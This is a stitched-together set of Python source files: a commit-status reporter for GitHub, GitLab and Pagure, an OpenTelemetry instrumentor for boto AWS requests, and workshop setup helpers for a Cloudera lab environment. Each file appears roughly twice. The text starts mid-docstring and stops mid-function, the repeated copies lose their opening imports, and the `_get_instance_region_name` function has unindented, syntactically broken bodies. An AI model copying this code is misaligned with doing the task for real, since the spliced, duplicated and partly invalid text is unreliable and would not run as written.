        :param state: state accepted by github
        :param description: the long text
        :param url: url to point to (logs usually)
        :param check_names: those in bold (a single name or a list of names)
        """
        if not check_names:
            logger.warning("No checks to set status for.")
            return
        elif isinstance(check_names, str):
            check_names = [check_names]
        for check in check_names:
            self.set_status(
                state=state, description=description, check_name=check, url=url
            )

    def __set_pull_request_status(
        self, check_name: str, description: str, url: str, state: CommitStatus
    ):
        """Set the flag on the PR itself (Pagure) when the commit is its head."""
        if self.pr_id is None:
            return
        pr = self.project.get_pr(self.pr_id)
        if hasattr(pr, "set_flag") and pr.head_commit == self.commit_sha:
            logger.debug("Setting the PR status (pagure only).")
            pr.set_flag(  # type: ignore
                username=check_name,
                comment=description,
                url=url,
                status=state,
                # For Pagure: generate a custom uid from the check_name,
                # so that we can update flags we set previously,
                # instead of creating new ones.
                uid=hashlib.md5(check_name.encode()).hexdigest(),
            )

    def report_status_by_comment(
        self,
        state: CommitStatus,
        url: str,
        check_names: Union[str, list, None],
        description: str,
    ):
        """
        Reporting build status with MR comment if no permission to the fork project
        """
        if isinstance(check_names, str):
            check_names = [check_names]
        comment_table_rows = [
            "| Job | Result |",
            "| ------------- | ------------ |",
        ] + [f"| [{check}]({url}) | {state.name.upper()} |" for check in check_names]
        table = "\n".join(comment_table_rows)
        self.comment(table + f"\n### Description\n\n{description}")

    def __add_commit_comment_with_status(
        self, state: CommitStatus, description: str, check_name: str, url: str = ""
    ):
        """Fallback: record the would-be status as a plain commit comment."""
        body = (
            "\n".join(
                [
                    f"- name: {check_name}",
                    f"- state: {state.name}",
                    f"- url: {url if url else 'not provided'}",
                ]
            )
            + f"\n\n{description}"
        )
        self.project.commit_comment(
            commit=self.commit_sha,
            body=body,
        )

    def set_status(
        self,
        state: CommitStatus,
        description: str,
        check_name: str,
        url: str = "",
    ):
        """Set one commit status, falling back to a commit comment on failure."""
        # Required because Pagure API doesn't accept empty url.
        if not url and isinstance(self.project, PagureProject):
            url = "https://wiki.centos.org/Manuals/ReleaseNotes/CentOSStream"
        logger.debug(
            f"Setting status '{state.name}' for check '{check_name}': {description}"
        )
        try:
            self.project_with_commit.set_commit_status(
                self.commit_sha, state, url, description, check_name, trim=True
            )
        except gitlab.exceptions.GitlabCreateError as e:
            # Ignoring Gitlab 'enqueue' error
            # https://github.com/packit-service/packit-service/issues/741
            if e.response_code != 400:
                # 403: No permissions to set status, falling back to comment
                # 404: Commit has not been found, e.g. used target project on GitLab
                logger.debug(
                    f"Failed to set status for {self.commit_sha}, commenting on"
                    f" commit as a fallback: {str(e)}"
                )
                self.__add_commit_comment_with_status(
                    state, description, check_name, url
                )
            if e.response_code not in {400, 403, 404}:
                raise
        except github.GithubException:
            self.__add_commit_comment_with_status(state, description, check_name, url)
        # Also set the status of the pull-request for forges which don't do
        # this automatically based on the flags on the last commit in the PR.
        self.__set_pull_request_status(check_name, description, url, state)

    def get_statuses(self):
        """Return the statuses already set on the reported commit."""
        # Fix: the original dropped the result and always returned None.
        return self.project_with_commit.get_commit_statuses(commit=self.commit_sha)

    def comment(self, body: str):
        """Comment on the PR when one is known, otherwise on the commit."""
        if self.pr_id:
            self.project.get_pr(pr_id=self.pr_id).comment(body=body)
        else:
            self.project.commit_comment(commit=self.commit_sha, body=body)
import hashlib
import logging
from typing import Optional, Union
import github
import gitlab
from ogr.abstract import CommitStatus, GitProject
from ogr.services.gitlab import GitlabProject
from ogr.services.pagure import PagureProject
logger = logging.getLogger(__name__)
class StatusReporter:
    """Report job results as commit statuses on GitHub/GitLab/Pagure.

    Falls back to commit comments when the forge refuses the status API call
    (missing permissions, unknown commit, ...).
    """

    def __init__(
        self,
        project: GitProject,
        commit_sha: str,
        pr_id: Optional[int] = None,
    ):
        """
        :param project: project the statuses belong to
        :param commit_sha: commit the statuses are attached to
        :param pr_id: pull/merge request number, when known
        """
        logger.debug(
            f"Status reporter will report for {project}, commit={commit_sha}, pr={pr_id}"
        )
        self.project: GitProject = project
        self._project_with_commit: Optional[GitProject] = None
        self.commit_sha: str = commit_sha
        self.pr_id: Optional[int] = pr_id

    @property
    def project_with_commit(self) -> GitProject:
        """
        Returns GitProject from which we can set commit status.
        """
        if self._project_with_commit is None:
            # For GitLab MRs the commit lives in the source project (the
            # fork), so the status has to be set there.
            self._project_with_commit = (
                self.project.get_pr(self.pr_id).source_project
                if isinstance(self.project, GitlabProject) and self.pr_id is not None
                else self.project
            )
        return self._project_with_commit

    def report(
        self,
        state: CommitStatus,
        description: str,
        url: str = "",
        check_names: Union[str, list, None] = None,
    ) -> None:
        """
        Set commit check status for each check name.

        :param state: state accepted by github
        :param description: the long text
        :param url: url to point to (logs usually)
        :param check_names: those in bold (a single name or a list of names)
        """
        if not check_names:
            logger.warning("No checks to set status for.")
            return
        elif isinstance(check_names, str):
            check_names = [check_names]
        for check in check_names:
            self.set_status(
                state=state, description=description, check_name=check, url=url
            )

    def __set_pull_request_status(
        self, check_name: str, description: str, url: str, state: CommitStatus
    ):
        """Set the flag on the PR itself (Pagure) when the commit is its head."""
        if self.pr_id is None:
            return
        pr = self.project.get_pr(self.pr_id)
        if hasattr(pr, "set_flag") and pr.head_commit == self.commit_sha:
            logger.debug("Setting the PR status (pagure only).")
            pr.set_flag(  # type: ignore
                username=check_name,
                comment=description,
                url=url,
                status=state,
                # For Pagure: generate a custom uid from the check_name,
                # so that we can update flags we set previously,
                # instead of creating new ones.
                uid=hashlib.md5(check_name.encode()).hexdigest(),
            )

    def report_status_by_comment(
        self,
        state: CommitStatus,
        url: str,
        check_names: Union[str, list, None],
        description: str,
    ):
        """
        Reporting build status with MR comment if no permission to the fork project
        """
        if isinstance(check_names, str):
            check_names = [check_names]
        comment_table_rows = [
            "| Job | Result |",
            "| ------------- | ------------ |",
        ] + [f"| [{check}]({url}) | {state.name.upper()} |" for check in check_names]
        table = "\n".join(comment_table_rows)
        self.comment(table + f"\n### Description\n\n{description}")

    def __add_commit_comment_with_status(
        self, state: CommitStatus, description: str, check_name: str, url: str = ""
    ):
        """Fallback: record the would-be status as a plain commit comment."""
        body = (
            "\n".join(
                [
                    f"- name: {check_name}",
                    f"- state: {state.name}",
                    f"- url: {url if url else 'not provided'}",
                ]
            )
            + f"\n\n{description}"
        )
        self.project.commit_comment(
            commit=self.commit_sha,
            body=body,
        )

    def set_status(
        self,
        state: CommitStatus,
        description: str,
        check_name: str,
        url: str = "",
    ):
        """Set one commit status, falling back to a commit comment on failure."""
        # Required because Pagure API doesn't accept empty url.
        if not url and isinstance(self.project, PagureProject):
            url = "https://wiki.centos.org/Manuals/ReleaseNotes/CentOSStream"
        logger.debug(
            f"Setting status '{state.name}' for check '{check_name}': {description}"
        )
        try:
            self.project_with_commit.set_commit_status(
                self.commit_sha, state, url, description, check_name, trim=True
            )
        except gitlab.exceptions.GitlabCreateError as e:
            # Ignoring Gitlab 'enqueue' error
            # https://github.com/packit-service/packit-service/issues/741
            if e.response_code != 400:
                # 403: No permissions to set status, falling back to comment
                # 404: Commit has not been found, e.g. used target project on GitLab
                logger.debug(
                    f"Failed to set status for {self.commit_sha}, commenting on"
                    f" commit as a fallback: {str(e)}"
                )
                self.__add_commit_comment_with_status(
                    state, description, check_name, url
                )
            if e.response_code not in {400, 403, 404}:
                raise
        except github.GithubException:
            self.__add_commit_comment_with_status(state, description, check_name, url)
        # Also set the status of the pull-request for forges which don't do
        # this automatically based on the flags on the last commit in the PR.
        self.__set_pull_request_status(check_name, description, url, state)

    def get_statuses(self):
        """Return the statuses already set on the reported commit."""
        # Fix: the original dropped the result and always returned None.
        return self.project_with_commit.get_commit_statuses(commit=self.commit_sha)

    def comment(self, body: str):
        """Comment on the PR when one is known, otherwise on the commit."""
        if self.pr_id:
            self.project.get_pr(pr_id=self.pr_id).comment(body=body)
        else:
            self.project.commit_comment(commit=self.commit_sha, body=body)
import logging
from inspect import currentframe
from boto.connection import AWSAuthConnection, AWSQueryConnection
from wrapt import wrap_function_wrapper
from opentelemetry.instrumentation.boto.version import __version__
from opentelemetry.instrumentation.instrumentor import BaseInstrumentor
from opentelemetry.instrumentation.utils import unwrap
from opentelemetry.sdk.trace import Resource
from opentelemetry.semconv.trace import SpanAttributes
from opentelemetry.trace import SpanKind, get_tracer
logger = logging.getLogger(__name__)
SERVICE_PARAMS_BLOCK_LIST = {"s3": ["params.Body"]}
def _get_instance_region_name(instance):
region = getattr(instance, "region", None)
if not region:
return None
if isinstance(region, str):
return region.split(":")[1]
return region.name
class BotoInstrumentor(BaseInstrumentor):
    """An instrumentor for Boto.

    See `BaseInstrumentor`
    """

    def __init__(self):
        super().__init__()
        self._original_boto = None

    def _instrument(self, **kwargs):
        """Patch boto's request entry points so each AWS call creates a span."""
        # AWSQueryConnection and AWSAuthConnection are two different classes
        # called by different services for connection.
        # For example EC2 uses AWSQueryConnection and S3 uses
        # AWSAuthConnection
        # pylint: disable=attribute-defined-outside-init
        self._tracer = get_tracer(
            __name__, __version__, kwargs.get("tracer_provider")
        )
        wrap_function_wrapper(
            "boto.connection",
            "AWSQueryConnection.make_request",
            self._patched_query_request,
        )
        wrap_function_wrapper(
            "boto.connection",
            "AWSAuthConnection.make_request",
            self._patched_auth_request,
        )

    def _uninstrument(self, **kwargs):
        """Restore the original, unwrapped make_request methods."""
        unwrap(AWSQueryConnection, "make_request")
        unwrap(AWSAuthConnection, "make_request")

    def _common_request(  # pylint: disable=too-many-locals
        self,
        args_name,
        traced_args,
        operation_name,
        original_func,
        instance,
        args,
        kwargs,
    ):
        """Execute the wrapped request inside a span and annotate it.

        :param args_name: positional-parameter names of the wrapped call
        :param traced_args: subset of args_name recorded as span attributes
        :param operation_name: AWS operation name, when it could be determined
        """
        endpoint_name = getattr(instance, "host").split(".")[0]
        with self._tracer.start_as_current_span(
            "{}.command".format(endpoint_name), kind=SpanKind.CONSUMER,
        ) as span:
            span.set_attribute("endpoint", endpoint_name)
            if args:
                http_method = args[0]
                span.set_attribute("http_method", http_method.lower())
            # Original func returns a boto.connection.HTTPResponse object
            result = original_func(*args, **kwargs)
            if span.is_recording():
                add_span_arg_tags(
                    span, endpoint_name, args, args_name, traced_args,
                )
                # Obtaining region name
                region_name = _get_instance_region_name(instance)
                meta = {
                    "aws.agent": "boto",
                    "aws.operation": operation_name,
                }
                if region_name:
                    meta["aws.region"] = region_name
                for key, value in meta.items():
                    span.set_attribute(key, value)
                span.set_attribute(
                    SpanAttributes.HTTP_STATUS_CODE, getattr(result, "status")
                )
                span.set_attribute(
                    SpanAttributes.HTTP_METHOD, getattr(result, "_method")
                )
            return result

    def _patched_query_request(self, original_func, instance, args, kwargs):
        """Wrapper for AWSQueryConnection.make_request (e.g. EC2)."""
        return self._common_request(
            ("operation_name", "params", "path", "verb"),
            ["operation_name", "params", "path"],
            args[0] if args else None,
            original_func,
            instance,
            args,
            kwargs,
        )

    def _patched_auth_request(self, original_func, instance, args, kwargs):
        """Wrapper for AWSAuthConnection.make_request (e.g. S3).

        The operation is not passed as an argument here; recover it by walking
        the stack up to the caller of ``make_request``.
        """
        # Fix: the original initialized ``operation_name = None`` twice.
        operation_name = None
        frame = currentframe().f_back
        while frame:
            if frame.f_code.co_name == "make_request":
                operation_name = frame.f_back.f_code.co_name
                break
            frame = frame.f_back
        return self._common_request(
            (
                "method",
                "path",
                "headers",
                "data",
                "host",
                "auth_path",
                "sender",
            ),
            ["path", "data", "host"],
            operation_name,
            original_func,
            instance,
            args,
            kwargs,
        )
def flatten_dict(dict_, sep=".", prefix=""):
    """
    Returns a normalized dict of depth 1 with keys in order of embedding
    """
    # NOTE: This should probably be in `opentelemetry.instrumentation.utils`.
    # adapted from https://stackoverflow.com/a/19647596
    if not isinstance(dict_, dict):
        # A leaf value is returned keyed by the accumulated prefix.
        return {prefix: dict_}
    flat = {}
    for outer_key, outer_value in dict_.items():
        for inner_key, inner_value in flatten_dict(outer_value, sep, outer_key).items():
            flat_key = prefix + sep + inner_key if prefix else inner_key
            flat[flat_key] = inner_value
    return flat
def add_span_arg_tags(span, aws_service, args, args_names, args_traced):
    """Record selected positional call arguments as span attributes.

    :param span: the recording span to annotate
    :param aws_service: endpoint name, used to filter sensitive services
    :param args: positional arguments of the wrapped call
    :param args_names: names matching the positions in ``args``
    :param args_traced: subset of names that should be recorded
    """
    def truncate_arg_value(value, max_len=1024):
        """Truncate values which are bytes and greater than `max_len`.

        Useful for parameters like "Body" in `put_object` operations.
        """
        if isinstance(value, bytes) and len(value) > max_len:
            return b"..."
        return value

    if not span.is_recording():
        return
    # Do not trace `Key Management Service` or `Secure Token Service` API calls
    # over concerns of security leaks.
    if aws_service not in {"kms", "sts"}:
        tags = dict(
            (name, value)
            for (name, value) in zip(args_names, args)
            if name in args_traced
        )
        tags = flatten_dict(tags)
        for param_key, value in tags.items():
            if param_key in SERVICE_PARAMS_BLOCK_LIST.get(aws_service, {}):
                continue
            # Fix: the original final line was fused with dataset metadata
            # ("| instrumentation/... | import logging"), breaking the syntax.
            span.set_attribute(param_key, truncate_arg_value(value))
from inspect import currentframe
from boto.connection import AWSAuthConnection, AWSQueryConnection
from wrapt import wrap_function_wrapper
from opentelemetry.instrumentation.boto.version import __version__
from opentelemetry.instrumentation.instrumentor import BaseInstrumentor
from opentelemetry.instrumentation.utils import unwrap
from opentelemetry.sdk.trace import Resource
from opentelemetry.semconv.trace import SpanAttributes
from opentelemetry.trace import SpanKind, get_tracer
logger = logging.getLogger(__name__)
SERVICE_PARAMS_BLOCK_LIST = {"s3": ["params.Body"]}
def _get_instance_region_name(instance):
region = getattr(instance, "region", None)
if not region:
return None
if isinstance(region, str):
return region.split(":")[1]
return region.name
class BotoInstrumentor(BaseInstrumentor):
    """An instrumentor for Boto.

    See `BaseInstrumentor`
    """

    def __init__(self):
        super().__init__()
        self._original_boto = None

    def _instrument(self, **kwargs):
        """Patch boto's request entry points so each AWS call creates a span."""
        # AWSQueryConnection and AWSAuthConnection are two different classes
        # called by different services for connection.
        # For example EC2 uses AWSQueryConnection and S3 uses
        # AWSAuthConnection
        # pylint: disable=attribute-defined-outside-init
        self._tracer = get_tracer(
            __name__, __version__, kwargs.get("tracer_provider")
        )
        wrap_function_wrapper(
            "boto.connection",
            "AWSQueryConnection.make_request",
            self._patched_query_request,
        )
        wrap_function_wrapper(
            "boto.connection",
            "AWSAuthConnection.make_request",
            self._patched_auth_request,
        )

    def _uninstrument(self, **kwargs):
        """Restore the original, unwrapped make_request methods."""
        unwrap(AWSQueryConnection, "make_request")
        unwrap(AWSAuthConnection, "make_request")

    def _common_request(  # pylint: disable=too-many-locals
        self,
        args_name,
        traced_args,
        operation_name,
        original_func,
        instance,
        args,
        kwargs,
    ):
        """Execute the wrapped request inside a span and annotate it.

        :param args_name: positional-parameter names of the wrapped call
        :param traced_args: subset of args_name recorded as span attributes
        :param operation_name: AWS operation name, when it could be determined
        """
        endpoint_name = getattr(instance, "host").split(".")[0]
        with self._tracer.start_as_current_span(
            "{}.command".format(endpoint_name), kind=SpanKind.CONSUMER,
        ) as span:
            span.set_attribute("endpoint", endpoint_name)
            if args:
                http_method = args[0]
                span.set_attribute("http_method", http_method.lower())
            # Original func returns a boto.connection.HTTPResponse object
            result = original_func(*args, **kwargs)
            if span.is_recording():
                add_span_arg_tags(
                    span, endpoint_name, args, args_name, traced_args,
                )
                # Obtaining region name
                region_name = _get_instance_region_name(instance)
                meta = {
                    "aws.agent": "boto",
                    "aws.operation": operation_name,
                }
                if region_name:
                    meta["aws.region"] = region_name
                for key, value in meta.items():
                    span.set_attribute(key, value)
                span.set_attribute(
                    SpanAttributes.HTTP_STATUS_CODE, getattr(result, "status")
                )
                span.set_attribute(
                    SpanAttributes.HTTP_METHOD, getattr(result, "_method")
                )
            return result

    def _patched_query_request(self, original_func, instance, args, kwargs):
        """Wrapper for AWSQueryConnection.make_request (e.g. EC2)."""
        return self._common_request(
            ("operation_name", "params", "path", "verb"),
            ["operation_name", "params", "path"],
            args[0] if args else None,
            original_func,
            instance,
            args,
            kwargs,
        )

    def _patched_auth_request(self, original_func, instance, args, kwargs):
        """Wrapper for AWSAuthConnection.make_request (e.g. S3).

        The operation is not passed as an argument here; recover it by walking
        the stack up to the caller of ``make_request``.
        """
        # Fix: the original initialized ``operation_name = None`` twice.
        operation_name = None
        frame = currentframe().f_back
        while frame:
            if frame.f_code.co_name == "make_request":
                operation_name = frame.f_back.f_code.co_name
                break
            frame = frame.f_back
        return self._common_request(
            (
                "method",
                "path",
                "headers",
                "data",
                "host",
                "auth_path",
                "sender",
            ),
            ["path", "data", "host"],
            operation_name,
            original_func,
            instance,
            args,
            kwargs,
        )
def flatten_dict(dict_, sep=".", prefix=""):
    """
    Returns a normalized dict of depth 1 with keys in order of embedding
    """
    # NOTE: This should probably be in `opentelemetry.instrumentation.utils`.
    # adapted from https://stackoverflow.com/a/19647596
    if not isinstance(dict_, dict):
        # A leaf value is returned keyed by the accumulated prefix.
        return {prefix: dict_}
    flat = {}
    for outer_key, outer_value in dict_.items():
        for inner_key, inner_value in flatten_dict(outer_value, sep, outer_key).items():
            flat_key = prefix + sep + inner_key if prefix else inner_key
            flat[flat_key] = inner_value
    return flat
def add_span_arg_tags(span, aws_service, args, args_names, args_traced):
    """Record selected positional call arguments as span attributes.

    :param span: the recording span to annotate
    :param aws_service: endpoint name, used to filter sensitive services
    :param args: positional arguments of the wrapped call
    :param args_names: names matching the positions in ``args``
    :param args_traced: subset of names that should be recorded
    """
    def truncate_arg_value(value, max_len=1024):
        """Truncate values which are bytes and greater than `max_len`.

        Useful for parameters like "Body" in `put_object` operations.
        """
        if isinstance(value, bytes) and len(value) > max_len:
            return b"..."
        return value

    if not span.is_recording():
        return
    # Do not trace `Key Management Service` or `Secure Token Service` API calls
    # over concerns of security leaks.
    if aws_service not in {"kms", "sts"}:
        tags = dict(
            (name, value)
            for (name, value) in zip(args_names, args)
            if name in args_traced
        )
        tags = flatten_dict(tags)
        for param_key, value in tags.items():
            if param_key in SERVICE_PARAMS_BLOCK_LIST.get(aws_service, {}):
                continue
            # Fix: the original final line was fused with dataset score
            # residue ("| 0.69035 | 0.149531"), breaking the syntax.
            span.set_attribute(param_key, truncate_arg_value(value))
import logging
import os
import re
import socket
import time
from abc import ABCMeta, abstractmethod
from contextlib import contextmanager
from datetime import datetime
from importlib import import_module
from inspect import getmembers
import requests
logging.basicConfig(level=logging.WARN)
LOG = logging.getLogger(__package__)
LOG.setLevel(logging.INFO)
# Global constants
LAB_METHOD_NAME_REGEX = r'lab([0-9]+)'
RUN_ID_ENV_VAR = 'RUN_ID'
THE_PWD_ENV_VAR = 'THE_PWD'
THE_PWD_FILE_NAME = 'the_pwd.txt'
ENABLE_TLS_FILE_NAME = '.enable-tls'
DEFAULT_TRUSTSTORE_PATH = '/opt/cloudera/security/x509/truststore.pem'
WORKSHOPS = {}
def _get_step_number(method_name):
    """Return the lab number encoded in a ``labNN`` method name, or None."""
    match = re.match(LAB_METHOD_NAME_REGEX, method_name)
    if match is None:
        return None
    return int(match.groups()[0])


def get_base_dir():
    """Return the directory containing this module ('.' when empty)."""
    return os.path.dirname(__file__) if os.path.dirname(__file__) else '.'


def get_run_id():
    """Return the run id from the RUN_ID env var, or a timestamp-based one."""
    if RUN_ID_ENV_VAR in os.environ:
        rid = os.environ[RUN_ID_ENV_VAR]
    else:
        rid = str(int(time.time()))
    LOG.debug('RUN_ID={}'.format(rid))
    return rid


def _get_parent_dir(path):
    """Return the resolved parent directory of *path*."""
    return os.path.realpath(os.path.join(path, '..'))


def get_the_pwd():
    """Return the workshop password from the env var or the_pwd.txt file."""
    if THE_PWD_ENV_VAR in os.environ:
        return os.environ[THE_PWD_ENV_VAR]
    return _get_the_pwd_from_file(get_base_dir())


def _get_the_pwd_from_file(path):
    """Search *path* and its ancestors for the_pwd.txt and return its contents.

    :raises RuntimeError: when the filesystem root is reached with no match
    """
    if path == '/':
        raise RuntimeError('Cannot get The Pwd. Please set the THE_PWD env variable.')
    file_path = os.path.join(path, THE_PWD_FILE_NAME)
    if os.path.exists(file_path):
        # Fix: use a context manager so the file handle is closed promptly;
        # the original open().read() leaked the handle until GC.
        with open(file_path) as pwd_file:
            return pwd_file.read()
    return _get_the_pwd_from_file(_get_parent_dir(path))
def get_truststore_path():
    """Return the path of the PEM truststore used to verify TLS requests."""
    return DEFAULT_TRUSTSTORE_PATH


def is_tls_enabled(path=None):
    """Return True if a .enable-tls marker exists in *path* or any ancestor."""
    if path is None:
        path = get_base_dir()
    if path == '/':
        return False
    elif os.path.exists(os.path.join(path, ENABLE_TLS_FILE_NAME)):
        return True
    else:
        # Keep walking up until the marker file or the root is found.
        return is_tls_enabled(_get_parent_dir(path))


def get_hostname():
    """Return the local host name."""
    return socket.gethostname()


def get_url_scheme():
    """Return 'https' when TLS is enabled, 'http' otherwise."""
    return 'https' if is_tls_enabled() else 'http'


def api_request(method, url, expected_code=requests.codes.ok, auth=None, **kwargs):
    """Issue an HTTP request, verifying TLS when enabled.

    :raises RuntimeError: when the response code differs from *expected_code*
    """
    truststore = get_truststore_path() if is_tls_enabled() else None
    LOG.debug('Request: method: %s, url: %s, auth: %s, verify: %s, kwargs: %s',
              method, url, 'yes' if auth else 'no', truststore, kwargs)
    resp = requests.request(method, url, auth=auth, verify=truststore, **kwargs)
    if resp.status_code != expected_code:
        raise RuntimeError('Request to URL %s returned code %s (expected was %s), Response: %s' % (
            resp.url, resp.status_code, expected_code, resp.text))
    return resp
class AbstractWorkshopMeta(ABCMeta):
    """Metaclass that auto-registers every workshop class in WORKSHOPS."""

    def __init__(cls, name, bases, dct):
        type.__init__(cls, name, bases, dct)
        # Register under the id the class reports; classes whose
        # workshop_id() is falsy (e.g. the abstract base, whose body is
        # just ``pass``) are skipped.
        if cls.workshop_id():
            WORKSHOPS[cls.workshop_id()] = cls
class AbstractWorkshop(metaclass=AbstractWorkshopMeta):
    """Base class for workshops composed of numbered ``labNN`` setup methods."""

    def __init__(self, run_id=None, context=None):
        class _Context(object):
            pass
        # The context object is shared with prereq workshops so they can
        # exchange data with each other.
        self.context = context or _Context()
        self.run_id = run_id if run_id is not None else get_run_id()

    @classmethod
    @abstractmethod
    def workshop_id(cls):
        """Return a short string to identify the workshop."""
        pass

    @classmethod
    @abstractmethod
    def prereqs(cls):
        """
        Return a list of prereqs for this workshop. The list can contain either:
        - Strings identifying the name of other workshops that need to be setup before this one does. In
        this case all the labs of the specified workshop will be setup.
        - Tuples (String, Integer), where the String specifies the name of the workshop and Integer the number
        of the last lab of that workshop to be executed/setup.
        """
        pass

    def before_setup(self):
        """Hook executed before any lab setup method runs."""
        pass

    def after_setup(self):
        """Hook executed after all lab setup methods have run."""
        pass

    @abstractmethod
    def teardown(self):
        """Undo everything this workshop's labs created."""
        pass

    def _setup_prereqs(self):
        """Run setup for every prereq workshop, up to its requested lab."""
        global WORKSHOPS
        for prereq in self.prereqs():
            if isinstance(prereq, str):
                workshop = prereq
                lab = 99  # 99 means "run every lab"
            else:
                workshop, lab = prereq
            LOG.info('Executing prereqs setup: Workshop {}, Lab < {}'.format(workshop, lab))
            WORKSHOPS[workshop](self.run_id, self.context).execute_setup(lab)

    def _teardown_prereqs(self):
        """Tear down every prereq workshop."""
        global WORKSHOPS
        for prereq in self.prereqs():
            if isinstance(prereq, str):
                workshop = prereq
            else:
                workshop, _ = prereq
            LOG.info('Executing prereqs teardown: Workshop {}'.format(workshop))
            WORKSHOPS[workshop](self.run_id, self.context).execute_teardown()

    def execute_setup(self, target_lab=99):
        """Run prereqs, hooks and every labNN method with NN < target_lab."""
        self._setup_prereqs()
        self.before_setup()
        lab_setup_functions = [(n, f, _get_step_number(n)) for n, f in
                               getmembers(self.__class__) if _get_step_number(n) is not None]
        # Fix: getmembers() yields names alphabetically, which would run
        # e.g. lab10 before lab2; order the labs by their numeric suffix.
        lab_setup_functions.sort(key=lambda entry: entry[2])
        # Fix: str(map(...)) logged a useless "<map object ...>" repr.
        LOG.debug("Found Lab Setup Functions: %s", str([num for _, _, num in lab_setup_functions]))
        for func_name, func, lab_number in lab_setup_functions:
            if lab_number < target_lab:
                LOG.info("Executing {}::{}".format(self.workshop_id(), func_name))
                func(self)
            else:
                LOG.debug("[{0}] is numbered higher than target [lab{1}], skipping".format(func_name, target_lab))
        self.after_setup()
        return self.context

    def execute_teardown(self):
        """Tear down this workshop and then its prereqs."""
        self.teardown()
        self._teardown_prereqs()

    def get_artifacts_dir(self):
        """Return the artifacts directory bundled with this workshop."""
        return os.path.join(os.path.dirname(__file__), 'artifacts', self.workshop_id())
def _load_workshops():
    """Import every workshop_*.py module so its classes self-register."""
    base_dir = get_base_dir()
    for f in os.listdir(base_dir):
        if f.startswith('workshop_') and os.path.isfile(os.path.join(base_dir, f)):
            # Convert the file name to a relative module name for import.
            f = '.' + f.replace('.py', '')
            import_module(f, package=__package__)


def global_setup(target_workshop='base', target_lab=99, run_id=None):
    """Run setup for *target_workshop* up to (but excluding) lab *target_lab*."""
    _load_workshops()
    if target_workshop in WORKSHOPS:
        # Fix: the original message swapped the lab and workshop arguments.
        LOG.info('Executing setup for Lab {} in Workshop {}'.format(target_lab, target_workshop))
        WORKSHOPS[target_workshop](run_id).execute_setup(target_lab)
    else:
        raise RuntimeError("Workshop [{}] not found. Known workshops are: {}".format(target_workshop, WORKSHOPS))
    LOG.info('Global setup completed successfully!')


def global_teardown(target_workshop='base', run_id=None):
    """Tear down one workshop, or all of them when target_workshop is None."""
    _load_workshops()
    if target_workshop is not None:
        LOG.info('Executing teardown for Workshop {}'.format(target_workshop))
        WORKSHOPS[target_workshop](run_id).execute_teardown()
    else:
        for target_workshop in WORKSHOPS:
            LOG.info('Executing teardown for Workshop {}'.format(target_workshop))
            WORKSHOPS[target_workshop](run_id).execute_teardown()
    LOG.info('Global teardown completed successfully!')
@contextmanager
def exception_context(obj):
    """Context manager that prints *obj* when the wrapped block raises."""
    try:
        yield
    except:
        # Deliberately bare: any raiser gets the context printed, then the
        # exception propagates unchanged.
        timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        print('%s - Exception context: %s' % (timestamp, obj))
        raise
def retry_test(max_retries=0, wait_time_secs=0):
    """Decorator retrying the wrapped callable on any Exception.

    Retries up to *max_retries* times, sleeping *wait_time_secs* between
    attempts, and re-raises the last exception when retries are exhausted.
    Fixes: the wrapped function's return value was silently discarded, and
    the original last line was fused with dataset metadata.
    """
    def wrap(f):
        def wrapped_f(*args, **kwargs):
            retries = 0
            while True:
                try:
                    # Fix: propagate f's result instead of dropping it.
                    return f(*args, **kwargs)
                except Exception:
                    if retries >= max_retries:
                        raise
                    retries += 1
                    time.sleep(wait_time_secs)
                    print('%s - Retry #%d' % (datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S'), retries))
        return wrapped_f
    return wrap
import os
import re
import socket
import time
from abc import ABCMeta, abstractmethod
from contextlib import contextmanager
from datetime import datetime
from importlib import import_module
from inspect import getmembers
import requests
logging.basicConfig(level=logging.WARN)
LOG = logging.getLogger(__package__)
LOG.setLevel(logging.INFO)
# Global constants
LAB_METHOD_NAME_REGEX = r'lab([0-9]+)'
RUN_ID_ENV_VAR = 'RUN_ID'
THE_PWD_ENV_VAR = 'THE_PWD'
THE_PWD_FILE_NAME = 'the_pwd.txt'
ENABLE_TLS_FILE_NAME = '.enable-tls'
DEFAULT_TRUSTSTORE_PATH = '/opt/cloudera/security/x509/truststore.pem'
WORKSHOPS = {}
def _get_step_number(method_name):
    """Return the lab number encoded in a ``labNN`` method name, or None."""
    match = re.match(LAB_METHOD_NAME_REGEX, method_name)
    if match is None:
        return None
    return int(match.groups()[0])


def get_base_dir():
    """Return the directory containing this module ('.' when empty)."""
    return os.path.dirname(__file__) if os.path.dirname(__file__) else '.'


def get_run_id():
    """Return the run id from the RUN_ID env var, or a timestamp-based one."""
    if RUN_ID_ENV_VAR in os.environ:
        rid = os.environ[RUN_ID_ENV_VAR]
    else:
        rid = str(int(time.time()))
    LOG.debug('RUN_ID={}'.format(rid))
    return rid


def _get_parent_dir(path):
    """Return the resolved parent directory of *path*."""
    return os.path.realpath(os.path.join(path, '..'))


def get_the_pwd():
    """Return the workshop password from the env var or the_pwd.txt file."""
    if THE_PWD_ENV_VAR in os.environ:
        return os.environ[THE_PWD_ENV_VAR]
    return _get_the_pwd_from_file(get_base_dir())


def _get_the_pwd_from_file(path):
    """Search *path* and its ancestors for the_pwd.txt and return its contents.

    :raises RuntimeError: when the filesystem root is reached with no match
    """
    if path == '/':
        raise RuntimeError('Cannot get The Pwd. Please set the THE_PWD env variable.')
    file_path = os.path.join(path, THE_PWD_FILE_NAME)
    if os.path.exists(file_path):
        # Fix: use a context manager so the file handle is closed promptly;
        # the original open().read() leaked the handle until GC.
        with open(file_path) as pwd_file:
            return pwd_file.read()
    return _get_the_pwd_from_file(_get_parent_dir(path))
def get_truststore_path():
    """Return the path of the PEM truststore used to verify TLS requests."""
    return DEFAULT_TRUSTSTORE_PATH


def is_tls_enabled(path=None):
    """Return True if a .enable-tls marker exists in *path* or any ancestor."""
    if path is None:
        path = get_base_dir()
    if path == '/':
        return False
    elif os.path.exists(os.path.join(path, ENABLE_TLS_FILE_NAME)):
        return True
    else:
        # Keep walking up until the marker file or the root is found.
        return is_tls_enabled(_get_parent_dir(path))


def get_hostname():
    """Return the local host name."""
    return socket.gethostname()


def get_url_scheme():
    """Return 'https' when TLS is enabled, 'http' otherwise."""
    return 'https' if is_tls_enabled() else 'http'


def api_request(method, url, expected_code=requests.codes.ok, auth=None, **kwargs):
    """Issue an HTTP request, verifying TLS when enabled.

    :raises RuntimeError: when the response code differs from *expected_code*
    """
    truststore = get_truststore_path() if is_tls_enabled() else None
